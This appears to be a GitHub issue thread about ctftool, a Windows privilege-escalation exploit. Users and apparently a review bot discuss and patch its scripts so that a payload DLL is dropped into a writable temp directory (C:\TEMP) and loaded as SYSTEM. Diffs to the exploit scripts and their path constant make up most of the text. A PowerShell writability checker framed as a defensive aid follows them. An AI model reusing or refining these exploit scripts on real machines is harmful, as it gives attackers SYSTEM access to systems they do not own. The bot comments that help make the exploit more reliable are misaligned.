handle unwritable temp dir #2
Comments
I think I will just need to do
Then update the path accordingly, this thing in ctf-exploit-common-win10.ctf:
Even easier:
This seems to work, testing on a few VMs now:
diff --git a/scripts/ctf-consent-system.ctf b/scripts/ctf-consent-system.ctf
index ded81b7..fcc7a6e 100644
--- a/scripts/ctf-consent-system.ctf
+++ b/scripts/ctf-consent-system.ctf
@@ -5,14 +5,14 @@
print Attempting to copy exploit payload...
-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*
# Print a warning if that didnt work.
repeat rc print
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print
print
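Review bot: the `XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*` line deserves a comment explaining the trailing `*`, which is what stops XCOPY from prompting whether the destination is a file or a directory; without that note a reader will take it for a typo. Two side effects of the hunk are also worth stating: dropping `%SYSTEMROOT%` means the script no longer follows a non-standard install drive, and the warning three lines below still only says the DLL must exist, which does not tell the user whether the copy failed because `C:\TEMP` is absent or because it is not writable, the exact case this issue is about. Consider printing the XCOPY return code or a second hint line so the failure is diagnosable.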
diff --git a/scripts/ctf-exploit-common-win10.ctf b/scripts/ctf-exploit-common-win10.ctf
index 98af118..e06af18 100644
--- a/scripts/ctf-exploit-common-win10.ctf
+++ b/scripts/ctf-exploit-common-win10.ctf
@@ -420,7 +420,7 @@ repeat r1 callstub 0 0 r3
print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
-set r2 0x5c504d45545c2e2e
+set r2 0x5c504d45545c3a43
patch 0 0xa8 r0 8 -0x120
set r1 r2
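Review bot: the new constant `0x5c504d45545c3a43` decodes (little-endian) to the eight bytes `C:\TEMP\`, the same length as the old `..\TEMP\`, so the patched size is unchanged and the `patch 0 0xa8 r0 8 -0x120` line needs no edit. The two lines above it were left stale, though: the `print` still names `"C:\WINDOWS\TEMP\EXPLOIT.DLL"` and the comment still says `lets load "../TEMP/EXPLOIT"`. Update both to the new path so the console output and the comment match what the script actually loads.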
diff --git a/scripts/ctf-logonui-system.ctf b/scripts/ctf-logonui-system.ctf
index 5d28dcc..b2dca0d 100644
--- a/scripts/ctf-logonui-system.ctf
+++ b/scripts/ctf-logonui-system.ctf
@@ -5,8 +5,8 @@
print Attempting to copy exploit payload...
-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*
# Print a warning if that didnt work.
repeat rc print |
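Review bot: this copy-and-warn block is the same text as in ctf-consent-system.ctf, edited by hand in both places; if the script language supports including a shared file, factor the payload path into one place so the next path change does not have to be repeated. The warning lines of this hunk are cut off on this page, so check that they were updated to `C:\TEMP\EXPLOIT.DLL` as was done in the consent-system script.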
Hmm OK, let's do it. Maybe I should use
as a note, the build where I have experienced the issue was 18362.267
Yep, same issue in Windows 1607. I also fixed it by doing this #2 (comment)
A comment on Twitter says that on some systems C:\Windows\Temp is not writable, but he got the exploit working using C:\Temp instead. https://twitter.com/matteomalvica/status/1161378715663831040
I should probably handle this in my script.
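The issue turns on whether a temp directory is writable by an unprivileged user. The following PowerShell script is an added example, not part of ctftool or the author's scripts: it checks the two paths named in this thread (C:\Windows\Temp and C:\Temp) both by reading their ACLs for broad write grants and by an empirical create-and-delete probe, so a defender can see which directory a DLL could be dropped into on a given build. The list of principals treated as "broad" and the function names are assumptions for this example.

```powershell
# Added example (not from the ctftool project): report whether the temp directories
# discussed in the issue are writable by unprivileged users.
$Candidates = 'C:\Windows\Temp', 'C:\Temp'   # paths named in the issue thread
# Principals whose write grant makes a directory effectively world-writable (assumed list).
$BroadPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'

function Get-BroadWriteAccess {
    # Return the Allow ACEs that give one of the broad principals CreateFiles (WriteData).
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadPrincipals -contains $_.IdentityReference.Value -and
        ($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::CreateFiles)
    }
}

function Test-DirWritable {
    # Empirical check from the current token: create and delete a uniquely named file.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $probe = Join-Path $Path ('acl-probe-{0}.tmp' -f [guid]::NewGuid())
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

foreach ($dir in $Candidates) {
    $exists   = Test-Path -LiteralPath $dir
    $writable = Test-DirWritable $dir
    $broad    = Get-BroadWriteAccess $dir |
                ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
    '{0,-18} exists={1,-5} writable-by-me={2,-5} broad-write-ACEs={3}' -f `
        $dir, $exists, $writable, ($broad -join ', ')
}
```

Run it from a standard (non-elevated) user session: the probe reports what that token can do, so an elevated shell would report both directories as writable regardless of their ACLs. The ACL column is the more durable signal, since it shows which principal a grant comes from, and it explains the difference the Twitter comment observed between builds where C:\Windows\Temp is locked down and ones where it is not.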